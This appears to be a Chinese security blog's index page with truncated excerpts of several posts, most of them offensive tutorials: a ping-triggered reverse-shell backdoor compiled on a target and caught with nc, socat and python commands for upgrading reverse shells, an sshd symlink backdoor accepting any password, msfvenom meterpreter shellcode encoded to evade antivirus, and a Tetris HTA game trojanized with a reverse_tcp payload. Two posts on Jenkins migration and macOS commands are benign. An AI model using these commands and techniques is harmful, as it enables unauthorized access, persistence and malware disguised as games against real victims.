ping-backdoor使用,配合Rootkit使用效果更佳

#使用方法:1.把下列代码复制到目标机器中,保存名为 ping-backdoor.c 2.使用gcc编译●gcc -static -o ping-backdoor ping-backdoor.c●strip ping-backdoor注:如果这一步出现错误,可以尝试安装静态编译解决 yum install glibc-static 3.在目标机器中运行,要以root权限开启后门●./ping-backdoor 4.在接收反弹的电脑上使用magic.py生成范本数据包,用来ping的时候填充,促发反弹●python3 magic.py reverse_ip reverse_port //类似这样 ac1f07931a0a2a7e 5.在反弹的电脑上开启nc监听●nc -lvvp reverse_port //要和使用magic.py时候填写的端口一致 6.在反弹的电脑上ping 带有后门的主 […]

查看全部


NC,bash反弹后非标准终端使用注意

一般在渗透过程中会反弹一个bash shell,但是此类反弹,命令行终端非正规的终端,键盘上下翻动无历史记录,vim编辑文件的时候,可能就会over。因为反弹出来的shell没有Sigint的,如果Ctrl+C,反弹出来的shell就会终止。这个日常操作过程中多少都会有人遇到过。然后往此反复重新反弹…. 1.可以弄一个伪终端,但是Ctrl+C还是会退出,但是显示效果和正式终端一样。 反弹成功后执行: python -c ‘import pty; pty.spawn(“/bin/bash”)’ 之后再 su 进入伪终端 2.使用socat反弹终端 监听机器执行: socat file:`tty`,raw,echo=0 tcp-listen:5555 靶机执行: socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:xxx. […]

查看全部


ssh 软连接后门使用

通过软连接建立一个ssh后门: ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oport=12345 说明:建立软连接到/usr/local/su 文件,也可以在其他目录,su文件名字不能变,变了就无法登录。当然可以通过其他设置,更改su名字也是可以的。然后启动,并指定监听12345端口,登录的时候密码随意即可,登录如下: ssh root@xxx.xxx.xxx.xxx -p 12345 注意:这个如果目标在执行软连接的时候,如果使用了其他账号创建,则登录的时候需要使用对应的账号,而非root 上面提到要更改软连接su名字,需要用以下命令,xxxxxx为你需要更改的名字: echo ” #%PAM-1.0 auth       sufficient   pam_rootok.so auth & […]

查看全部


shellcode貌似又不免杀了,继续更新….(20190525)

之前说过使用msf生成shellcode 使用特殊编码十五六次就可以过静态查杀了,奈何Anti Virus(反病毒软件), 简称AV。不可能一直允许的啊…. 不废话了,直接还是shellcode生成,继续过AV。 msfvenom -p windows/meterpreter/reverse_https lhost=xxx.xxx.xxx.xxx lport=8888 -e x86/shikata_ga_nai -i 15 –smallest -b ‘\x00’ -f c > 1 把1里的shellcode编译成exe即可,至于为什么能过AV,可能是使用了http协议,对于日一台web服务器,AV们也不敢管,也不敢细问啊….

查看全部


centos下jenkins服务器迁移笔记

一、备份即将迁移的服务器jenkins所有配置和文件 1.rpm -qa|grep jenkins //查看已安装的jenkins信息 2.rpm -ql jenkins-2.164.3-1.1.noarch //查看所有jenkins的相关 然后分别将这些文件copy到一个bak目录(注意,当前根目录下的.jenkins(即~/.jenkins 也需要打包),并压缩bak文件夹copy到新的服务器 二、新服务器安装必要依赖软件并启用jenkins 1.查看服务器时间是否正确,如果正确可忽略这一步: date //查看当前时间,如果和当前区域时间不准,请进行下列操作 yum install -y ntpdate ntpdate time.windows.com 2.yum -y groupinstall “Development tools” //安装开发库工具包 3.yum instal […]

查看全部


俄罗斯方块加入反弹后门方法(免杀)

注:免责申明,该方法只是用来娱乐,切勿做任何违法行为。一、主要步骤:1.制作一个hta(http application)游戏,文中用的是俄罗斯方块2.用msf生成一个hta-psh 嵌入到hta游戏里面3.用rar压缩文件把hta压缩成一个自动解压的exe文件,并自定义一个程序图标(安全,过杀软)最终效果如下: 开始: 1.制作一个hta游戏,俄罗斯方块,hta代码如下:(也可以找其他游戏替代) 将下列代码保存为后缀为hta文件,打开看看能不能运行,然后继续…. 2.用msf生成一个hta-psh 嵌入到hta游戏里面 使用msfconsole -n进入msf(最新版msf需要进入后才能使用msfvenom命令) msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f ht […]

查看全部


MacOS 不常用的各种命令

一.界面相关的设置: 1.#osascript 桌面消息通知,有些时候写脚本定时出发桌面的消息通知用osascript -e ‘display notification “Come on Come on turn the radio on” with title “您有信息消息啦” subtitle “Hello,Jove”‘#效果这样子如下: 2.#设置计算机名称(也可以通过系统偏好设置→共享)sudo scutil –set ComputerName “0x6D746873″sudo scutil –set HostName “0x6D746873″sudo scutil –set LocalHostName “0x6D746873″sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.smb […]

查看全部